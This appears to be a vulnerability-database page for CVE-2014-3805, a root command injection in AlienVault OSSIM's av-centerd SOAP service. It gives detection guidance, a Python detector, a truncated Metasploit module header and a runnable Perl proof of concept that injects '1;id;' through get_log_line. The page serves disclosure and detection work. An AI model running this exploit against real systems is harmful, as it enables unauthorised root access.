CVE-2014-3805
Published 2014-06-13
Priority: P2 (66) · Severity: critical
CVSS 2.0 base score: 10.0 (vector AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit: public exploit code available (see the Exploit-DB entries below)
EPSS: 13.07% (95.9th percentile)
The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) get_license, (2) get_log_line, or (3) update_system/upgrade_pro_web request, a different vulnerability than CVE-2014-3804.
Affected
29 ranges indexed; only the first carries a version bound, the remaining entries were not recovered from the source.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alienvault | open_source_security_information_management | <= 4.6.1 | 4.7.0 |
Detection & IOCs
Indicator (command), from the public PoC:
get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')
Detection:
- Detect SOAP POST requests to /av-centerd on port 40007 that invoke get_log_line, get_license, or update_system/upgrade_pro_web with shell metacharacters (semicolons, pipes, backticks, $( )) in any parameter; these indicate command injection attempts.
- Alert on SOAP requests whose SOAPAction header is 'AV/CC/Util#get_log_line' and that target /av-centerd over HTTPS on port 40007.
- During reconnaissance, a SOAPServer response header of 'SOAP::Lite' on /av-centerd fingerprints the service stack; it does not by itself distinguish patched from unpatched installs.
- Successful exploitation returns root-level command output in the SOAP response. Because Perl's system() hands a string containing metacharacters to /bin/sh, monitor for the av-centerd daemon spawning a shell whose children include unexpected binaries (perl, nc, openssl, python, id) alongside the expected log-reading utility such as tail.
- Flag SOAP requests to /av-centerd using the get_dpkg method; the Metasploit module calls it to fingerprint OSSIM versions prior to 4.7.0.
Caveats:
- The vulnerability exists only in AlienVault OSSIM versions before 4.7.0; the Metasploit check returns Safe for version >= 4.7.0.
- The av-centerd SOAP service listens on port 40007 over SSL/TLS, so network detection rules need TLS inspection or must be complemented by endpoint-based detection.
- The $r_file checks (rejecting '/../' and requiring a /var/log/ or /var/ossec/ prefix) are bypassed by appending shell syntax to an otherwise valid path, so path-only filtering is insufficient both as a fix and as a detection criterion.
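The two points above, metacharacter-based detection of the injectable methods and the bypassable path filter, as an added Python example that is not part of this page's sources or of OSSIM's own code. The SOAP body shape, the c-gensym element names and the naive filter are assumptions reconstructed from the notes and the PoC call; the detector is meant to run on decrypted request bodies (TLS inspection or a host-side proxy), not on raw port-40007 traffic.

```python
import posixpath
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "{http://schemas.xmlsoap.org/soap/envelope/}"
# Methods the CVE names as injectable.
SUSPECT_METHODS = {"get_log_line", "get_license", "update_system", "upgrade_pro_web"}
# Characters that break out of a /bin/sh command string built by Perl's system().
SHELL_META = re.compile(r"[;|&`$()<>\n\r]")
# Prefixes the IOC notes say the original filter allowed for $r_file.
ALLOWED_PREFIXES = ("/var/log/", "/var/ossec/")


def naive_path_check(r_file: str) -> bool:
    """Reconstruction (an assumption, not the Util.pm source) of a prefix plus
    '/../' filter. It accepts '/var/log/auth.log;id' because the shell syntax
    follows a valid prefix."""
    if "/../" in r_file:
        return False
    return r_file.startswith(ALLOWED_PREFIXES)


def hardened_path_check(r_file: str) -> bool:
    """Allowlist the character set, normalise, then apply the prefix rule.
    The real fix is to never build a shell string from the value; this check
    is only the input-validation half of that."""
    if not re.fullmatch(r"/[A-Za-z0-9._/-]+", r_file):
        return False
    return posixpath.normpath(r_file).startswith(ALLOWED_PREFIXES)


def build_request(r_file: str, r_line: str) -> str:
    """Constructed SOAP 1.1 body in the shape SOAP::Lite emits for the PoC call
    (positional arguments become c-gensymN elements). Sample data only."""
    params = ["All", "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2",
              "172.26.22.1", "test", r_file, r_line]
    items = "".join(
        f'<c-gensym{2 * i + 3} xsi:type="xsd:string">{escape(p)}</c-gensym{2 * i + 3}>'
        for i, p in enumerate(params)
    )
    return (
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
        'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns1="AV/CC/Util">'
        f"<soap:Body><ns1:get_log_line>{items}</ns1:get_log_line></soap:Body>"
        "</soap:Envelope>"
    )


def parse_soap_call(body: str):
    """Return (method_name, [parameter strings]) from a SOAP 1.1 envelope."""
    soap_body = ET.fromstring(body).find(SOAP_NS + "Body")
    if soap_body is None or len(soap_body) == 0:
        return None, []
    call = soap_body[0]
    return call.tag.rsplit("}", 1)[-1], [(child.text or "") for child in call]


def inspect_request(headers: dict, body: str) -> list:
    """Flag parameters of an injectable av-centerd method that carry shell
    metacharacters. Returns [(method, param_index, value), ...]."""
    method, params = parse_soap_call(body)
    action = headers.get("SOAPAction", "").strip('"')
    if method is None and "#" in action:   # empty Body: fall back to the header
        method = action.rsplit("#", 1)[1]
    if method not in SUSPECT_METHODS:
        return []
    return [(method, i, p) for i, p in enumerate(params) if SHELL_META.search(p)]


if __name__ == "__main__":
    headers = {"SOAPAction": '"AV/CC/Util#get_log_line"'}
    for r_file, r_line in [("/var/log/auth.log", "1"),
                           ("/var/log/auth.log", "1;id;"),
                           ("/var/log/auth.log;id", "1")]:
        print(r_file, r_line, "naive:", naive_path_check(r_file),
              "hardened:", hardened_path_check(r_file),
              "findings:", inspect_request(headers, build_request(r_file, r_line)))
```

The detector deliberately checks every parameter rather than only the file path, since the PoC on this page places the injection in the last argument while the module description attributes it to $r_file; either way the shell metacharacter is the invariant. The path functions show why the prefix filter on its own is not a fix: the naive check passes '/var/log/auth.log;id', the hardened one rejects it.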
GHSA
GHSA-f68v-p32j-mqvq · CVE-2014-3805 · CRITICAL · CWE-94 · ghsa_unreviewed · 2022-05-17 · CVSS 10.0
The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) get_license, (2) get_log_line, or (3) update_system/upgrade_pro_web request, a different vulnerability than CVE-2014-3804.
GHSA
GHSA-3f7x-rf2q-c7q4 · CVE-2014-5210 · CRITICAL · CWE-94 · ghsa_unreviewed · 2022-05-17 · CVSS 10.0
The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) remote_task or (2) get_license request, a different vulnerability than CVE-2014-3804 and CVE-2014-3805.
GHSA
GHSA-wmc3-5pmj-wx7f · CVE-2014-3804 · CRITICAL · CWE-94 · ghsa_unreviewed · 2022-05-17 · CVSS 10.0
The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) update_system_info_debian_package, (2) ossec_task, (3) set_ossim_setup admin_ip, (4) sync_rserver, or (5) set_ossim_setup framework_ip request, a different vulnerability than CVE-2014-3805.
No detection rules found.
Exploit-DB
Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)
exploitdb · 2017-09-13 · CVE-2014-3805
Module header as indexed (the excerpt is cut off at the target definition; the class declaration and initialize() wrapper, which the extraction dropped, are restored from the standard Metasploit module layout):

```ruby
require 'msf/core'
require 'rexml/document'

class MetasploitModule < Msf::Exploit::Remote
  # Module mixins (HttpClient etc.) are not visible in the excerpt.

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Alienvault OSSIM av-centerd Command Injection get_log_line',
      'Description'    => %q{
        This module exploits a command injection flaw found in the get_log_line
        function found within Util.pm. The vulnerability is triggered due to an
        unsanitized $r_file parameter passed to a string which is then executed
        by the system
      },
      'Author'         => [ 'james fitts' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-3805' ],
          [ 'OSVDB', '107992' ]
        ],
      'Privileged'     => true,   # commands run as root
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'DefaultOptions' =>
        {
          'SSL' => true,          # av-centerd speaks HTTPS on 40007
        },
      'Payload'        =>
        {
          'Compat' => {
            'RequiredCmd' => 'perl netcat-e openssl python gawk'
          }
        },
      # 'DefaultTarge ... the excerpt indexed here ends at this point; the
      # remaining options, check() and exploit() are not on this page.
    ))
  end
end
```
Exploit-DB
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution
exploitdb · 2014-06-18 · CVE-2014-3805 · CRITICAL · CVSS 10.0
Original Perl PoC, with the SOAP::Lite call chain restored where the extraction merged the title into the first line of code:

```perl
#!/usr/bin/perl
use strict;
use warnings;
use SOAP::Lite;

# Added for runnability: av-centerd presents a self-signed certificate, so
# LWP's hostname verification would otherwise abort the request.
$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;

# The last argument is the injection point: '1;id;' terminates the command
# that av-centerd builds around the log path and runs 'id' as root.
my @soap_response = SOAP::Lite
    -> uri('AV/CC/Util')
    -> proxy('https://172.26.22.2:40007/av-centerd')
    -> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2', '172.26.22.1', 'test', '/var/log/auth.log', '1;id;')
    -> result;

for (@{ $soap_response[0] }) {
    print "$_\n";
}
# If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)
```
No writeups or analysis indexed.
References
- http://forums.alienvault.com/discussion/2690
- http://zerodayinitiative.com/advisories/ZDI-14-198/
- http://zerodayinitiative.com/advisories/ZDI-14-199/
- http://zerodayinitiative.com/advisories/ZDI-14-204/
- https://www.exploit-db.com/exploits/42709/